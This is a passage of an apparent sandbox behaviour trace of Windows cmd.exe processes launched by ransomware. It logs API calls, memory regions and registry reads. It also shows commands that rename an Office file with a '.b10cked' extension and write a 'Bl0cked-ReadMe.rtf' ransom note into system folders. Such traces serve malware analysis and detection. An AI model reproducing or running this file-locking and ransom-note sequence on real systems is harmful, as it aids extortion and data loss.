1 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0152.160] _wcsnicmp 
(_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0152.160] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0152.160] _wcsicmp (_String1="ENVELO~1.TRX", _String2=".") returned 55 [0152.160] _wcsicmp (_String1="ENVELO~1.TRX", _String2="..") returned 55 [0152.160] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\envelo~1.trx")) returned 0x2020 [0152.161] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x221f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.161] SetErrorMode (uMode=0x0) returned 0x0 [0152.161] SetErrorMode (uMode=0x1) returned 0x0 [0152.161] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX", nBufferLength=0x104, lpBuffer=0x14ed8c, lpFilePart=0x14ed74 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX", lpFilePart=0x14ed74*="ENVELO~1.TRX") returned 0x3c [0152.161] SetErrorMode (uMode=0x0) returned 0x1 [0152.161] GetFileAttributesW 
(lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2010 [0152.161] _wcsicmp (_String1="ENVELO~1.TRX", _String2=".") returned 55 [0152.161] _wcsicmp (_String1="ENVELO~1.TRX", _String2="..") returned 55 [0152.161] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\envelo~1.trx")) returned 0x2020 [0152.161] SetErrorMode (uMode=0x0) returned 0x0 [0152.161] SetErrorMode (uMode=0x1) returned 0x0 [0152.161] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX", nBufferLength=0x104, lpBuffer=0x14f208, lpFilePart=0x14efa0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX", lpFilePart=0x14efa0*="ENVELO~1.TRX") returned 0x3c [0152.161] SetErrorMode (uMode=0x0) returned 0x1 [0152.162] SetErrorMode (uMode=0x0) returned 0x0 [0152.162] SetErrorMode (uMode=0x1) returned 0x0 [0152.162] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x14f410, lpFilePart=0x14efa0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked", lpFilePart=0x14efa0*="ENVELOPR.DLL.trx_dll.b10cked") returned 0x4c [0152.162] SetErrorMode (uMode=0x0) returned 0x1 [0152.162] SetLastError (dwErrCode=0x0) [0152.162] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\envelopr.dll.trx_dll.b10cked")) returned 0xffffffff [0152.162] GetLastError () returned 0x2 [0152.162] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x14e91c, fSearchOp=0x0, 
lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e91c) returned 0x222130 [0152.162] FindNextFileW (in: hFindFile=0x222130, lpFindFileData=0x14e91c | out: lpFindFileData=0x14e91c) returned 0 [0152.163] GetLastError () returned 0x12 [0152.163] FindClose (in: hFindFile=0x222130 | out: hFindFile=0x222130) returned 1 [0152.165] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x221cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x221cc0) returned 0x222130 [0152.165] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x14ebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0152.165] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x14ebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0152.165] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\envelopr.dll.trx_dll")) returned 0x2020 [0152.165] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\envelopr.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\envelopr.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0152.166] FindClose (in: hFindFile=0x222130 | out: hFindFile=0x222130) returned 1 [0152.166] _vsnwprintf (in: 
_Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x14eb68 | out: _Buffer=" 1") returned 9 [0152.166] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.166] GetFileType (hFile=0x7) returned 0x2 [0152.166] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0152.166] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14eaf4 | out: lpMode=0x14eaf4) returned 1 [0152.166] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.166] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14eb28 | out: lpConsoleScreenBufferInfo=0x14eb28) returned 1 [0152.166] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0152.167] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x14eb68 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0152.167] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x14eb4c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14eb4c*=0x1a) returned 1 [0152.167] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.167] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0152.167] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.167] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0152.167] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.167] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0152.168] SetConsoleInputExeNameW () returned 0x1 [0152.168] GetConsoleOutputCP () returned 0x1b5 [0152.168] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.168] SetThreadUILanguage (LangId=0x0) returned 0x409 [0152.168] exit (_Code=0) Process: id = "246" image_name = "cmd.exe" filename 
= "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0xd1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20195 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20196 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20197 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20198 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 20199 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20200 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20201 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = 
mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20202 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20203 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 20204 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20252 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20253 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20254 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20255 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 20256 start_va = 0x460000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 20257 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 20258 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20259 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = 
mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20260 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20261 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20262 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20263 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20264 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20265 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20266 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 20267 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20268 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: 
"c:\\windows\\system32\\msctf.dll") Region: id = 20269 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 20270 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 20271 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 20272 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 20273 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 20274 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 20275 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Thread: id = 309 os_tid = 0xc2c [0152.036] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfe4c | out: lpSystemTimeAsFileTime=0x2cfe4c*(dwLowDateTime=0x948e4f00, dwHighDateTime=0x1d440a9)) [0152.037] GetCurrentProcessId () returned 0xd1c [0152.037] GetCurrentThreadId () returned 0xc2c [0152.037] GetTickCount () returned 0x2eed0 [0152.037] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfe44 | out: lpPerformanceCount=0x2cfe44*=20882588803) returned 1 [0152.037] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0152.037] __set_app_type (_Type=0x1) [0152.037] __p__fmode () returned 0x76b331f4 [0152.038] __p__commode () returned 0x76b331fc [0152.038] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0152.038] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: 
_Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0152.038] GetCurrentThreadId () returned 0xc2c [0152.038] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc2c) returned 0x38 [0152.038] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0152.038] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0152.038] SetThreadUILanguage (LangId=0x0) returned 0x409 [0152.038] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0152.038] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfddc | out: phkResult=0x2cfddc*=0x0) returned 0x2 [0152.038] VirtualQuery (in: lpAddress=0x2cfe13, lpBuffer=0x2cfdac, dwLength=0x1c | out: lpBuffer=0x2cfdac*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.039] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfdac, dwLength=0x1c | out: lpBuffer=0x2cfdac*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0152.039] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfdac, dwLength=0x1c | out: lpBuffer=0x2cfdac*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0152.039] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfdac, dwLength=0x1c | out: lpBuffer=0x2cfdac*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.039] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfdac, dwLength=0x1c | out: lpBuffer=0x2cfdac*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, 
State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0152.039] GetConsoleOutputCP () returned 0x1b5 [0152.039] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.039] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0152.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.039] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0152.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.039] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0152.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.039] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0152.040] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.040] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0152.040] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.040] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0152.040] GetEnvironmentStringsW () returned 0x4701b0* [0152.040] FreeEnvironmentStringsW (penv=0x4701b0) returned 1 [0152.040] GetEnvironmentStringsW () returned 0x4701b0* [0152.040] FreeEnvironmentStringsW (penv=0x4701b0) returned 1 [0152.040] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ced4c | out: phkResult=0x2ced4c*=0x40) returned 0x0 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x0, lpData=0x2ced58*=0xe8, lpcbData=0x2ced50*=0x1000) returned 0x2 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x4, lpData=0x2ced58*=0x1, lpcbData=0x2ced50*=0x4) returned 0x0 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, 
lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x0, lpData=0x2ced58*=0x1, lpcbData=0x2ced50*=0x1000) returned 0x2 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x4, lpData=0x2ced58*=0x0, lpcbData=0x2ced50*=0x4) returned 0x0 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x4, lpData=0x2ced58*=0x40, lpcbData=0x2ced50*=0x4) returned 0x0 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x4, lpData=0x2ced58*=0x40, lpcbData=0x2ced50*=0x4) returned 0x0 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x0, lpData=0x2ced58*=0x40, lpcbData=0x2ced50*=0x1000) returned 0x2 [0152.041] RegCloseKey (hKey=0x40) returned 0x0 [0152.041] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ced4c | out: phkResult=0x2ced4c*=0x40) returned 0x0 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x0, lpData=0x2ced58*=0x40, lpcbData=0x2ced50*=0x1000) returned 0x2 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x4, lpData=0x2ced58*=0x1, lpcbData=0x2ced50*=0x4) returned 0x0 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: 
lpType=0x2ced54*=0x0, lpData=0x2ced58*=0x1, lpcbData=0x2ced50*=0x1000) returned 0x2 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x4, lpData=0x2ced58*=0x0, lpcbData=0x2ced50*=0x4) returned 0x0 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x4, lpData=0x2ced58*=0x9, lpcbData=0x2ced50*=0x4) returned 0x0 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x4, lpData=0x2ced58*=0x9, lpcbData=0x2ced50*=0x4) returned 0x0 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x0, lpData=0x2ced58*=0x9, lpcbData=0x2ced50*=0x1000) returned 0x2 [0152.041] RegCloseKey (hKey=0x40) returned 0x0 [0152.041] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637a [0152.041] srand (_Seed=0x5b88637a) [0152.041] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\Bl0cked-ReadMe.rtf\"" [0152.041] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\Bl0cked-ReadMe.rtf\"" [0152.042] GetCurrentDirectoryW (in: nBufferLength=0x104, 